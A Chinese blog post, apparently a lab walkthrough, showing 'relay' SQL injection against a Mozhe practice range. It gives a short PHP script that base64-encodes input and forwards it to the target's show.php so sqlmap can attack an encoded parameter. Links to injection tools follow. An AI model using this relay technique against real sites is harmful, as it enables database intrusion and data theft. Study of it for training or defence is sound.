SQL注入——中转注入利用方法漏洞复现

最新推荐文章于 2024-06-14 09:54:04 发布
最新推荐文章于 2024-06-14 09:54:04 发布
阅读量2.4k 收藏 13
点赞数 2
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/110088186
版权

一、中转注入介绍

比如受害者网站URL注入点是经过编码的,不能直接结合sqlmap进行漏洞利用,所以本地搭建一个网站,写一个php脚本编码文件,就可以结合sqlmap工具进行测试。
因为,注入点经过复杂编码之后,就不能直接结合sqlmap进行漏洞攻击了。或者sqlmap自己编写tamper脚本进行攻击

二、中转注入复现

目标网站:https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe
访问目标网站,查看目标网站URL,可以看出id值是被base64编码了,sqlmap不能直接注入攻击
在这里插入图片描述
那么在本地利用phpstudy搭建一个网站,并写文件zz.php

<?php 
$id = base64_encode($_GET['id']);
echo file_get_contents("http://219.153.49.228:40817/show.php?id=$id");


//base64_encode base67编码
//file_get_contents 网络请求
?>

之后访问本地文件zz.php http://127.0.0.1/zz.php?id=1就类似于直接访问http://219.153.49.228:40817/show.php?id=MQo=
在这里插入图片描述
接下来利用sqlmap进行攻击
在这里插入图片描述
在这里插入图片描述

更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
在这里插入图片描述

W小哥1
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
注入中转工具
10-07
最强大的注入中转工具,你值得拥有
利用SQL注入漏洞登录后台的实现方法
12-15
当攻击者成功利用SQL注入漏洞,他们可以构造恶意的SQL语句,以操纵数据库查询,获取敏感信息,甚至完全控制服务器。以下是对SQL注入的详细解释及其在登录后台中的实施方法。 1. **SQL注入的基本原理**: SQL注入的...
【SQL代理中转注入】对DVWA登录界面username字段实施注入
Mr_Fmnwon的博客
04-24 911
以DVWA登陆界面为攻击目标,将login.php中第21、22行对username的防护注释掉。
SQL注入漏洞利用
最新发布
2201_75735270的博客
06-14 1041
SQL注入是一种注入攻击,可以执行恶意SQL语句。这些语句控制Web应用程序后面的数据库服务器。攻击者可以利用SQL 注入漏洞规避应用程序安全性方面的努力。他们可以绕过页面或Web应用程序的身份验证和授权,并恢复整个SQL数据库的内容。他们同样可以利用SQL注入来包含,更改和擦除数据库中的记录。SQL注入漏洞可能会影响使用SQL数据库的任何站点或Web应用程序,例如MySQL,Oracle,MSSQL或其他。
中转注入
ahqszbgaf775154642的博客
10-06 301
没技术含量,纯属记录之前学过的一个注入方法。百度一大堆的东西,以前写的,留恋。。。o(∩_∩)o 遇到这种情况很蛋疼。。。无法注入,那咋办啊?以前很多时候都是放弃了,知道有一天遇到中转注入,嘿嘿,我邪恶了。。。。 第一个框改为?后面的东西,把数值去掉 第二个框第三个框就是url,不要?后面的一串 第四个不用管他 第五个就把=后面写成注入点的数值 点击生成asp...
一次sql注入中转
weixin_34128501的博客
03-17 165
今天一朋友丢过来一个注入让我看看 url:http://xxxx/ 先看下页面 常规测试一下 用户名输入:' or 1=1 -- - 密码任意 返回 用户名输入:' or 1=2 -- - 返回 基本可以判断存在注入 http request: POST /xxxx.php HTTP/1.1 Host: xxxx Connection: keep-a...
PHP sql中转注入
Pz_mstr's Blog
11-19 732
&lt;?php function encode($id){ $id = $id.'hxb2018'; $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,''); mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021'); $data = ba...
cookie中转注入
weixin_34038293的博客
07-26 133
 目标地址www.jzvales.com/jzvales/ProductShow.asp?ID=568首先,我们添加单引号进行注入判断,结果显示如下 熟悉***的朋友都知道该网站是使用了通用的防注入,只是过滤了post参数,但是没有过滤cookie参数,所以我们使用注入中转工具是继续打开注入注入中转生成器填写一下数据然后生成asp文件  我们打开生成的文件 (生成的文件在使用之前一定要确定本机本机...
利用SQL注入漏洞拖库的方法
12-15
想在本地测试的话,可以在此免积分下载:利用SQL注入漏洞拖库 同上一篇文章一样,我们需要创建数据表,并在表中出入几条数据以备测试之用。 在数据库中建立一张表: 代码如下: CREATE TABLE `article` ( `articleid`...
SQL注入漏洞全接触.ppt
11-15
四、 SQL注入漏洞的检测方法 * 使用1=1、1=2测试法来检测SQL注入漏洞。 * 根据返回的结果,可以判断是否可以注入。 * 可以使用单引号测试法来检测SQL注入漏洞,但是这种方法不一定准确。 五、 SQL注入漏洞的防御...
sqlmap中转注入
Anonymous
01-14 2138
当使用 sqlmap 测试注入点时出现下列信息时,就需要在请求网址时忽略SSL证书 python3 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxxx" --batch --delay=1 --random-agent ___ __H__ ___ ___["]_____ ___ ___ {1.5.4.7#dev} |_ -| . [)] | .'| . | |___|_ ["]_|_|_|__
中转注入工具
07-23
中转注入工具
注入中转生成器
04-13
注入中转生成器
cookie注入中转工具
07-19
注入中转.exe,cookie注入工具,看谁下载。
SQL注入之二次,加解密,DNS,中转注入
weixin_51583033的博客
02-16 360
SQL注入之二次,加解密,DNS,中转注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值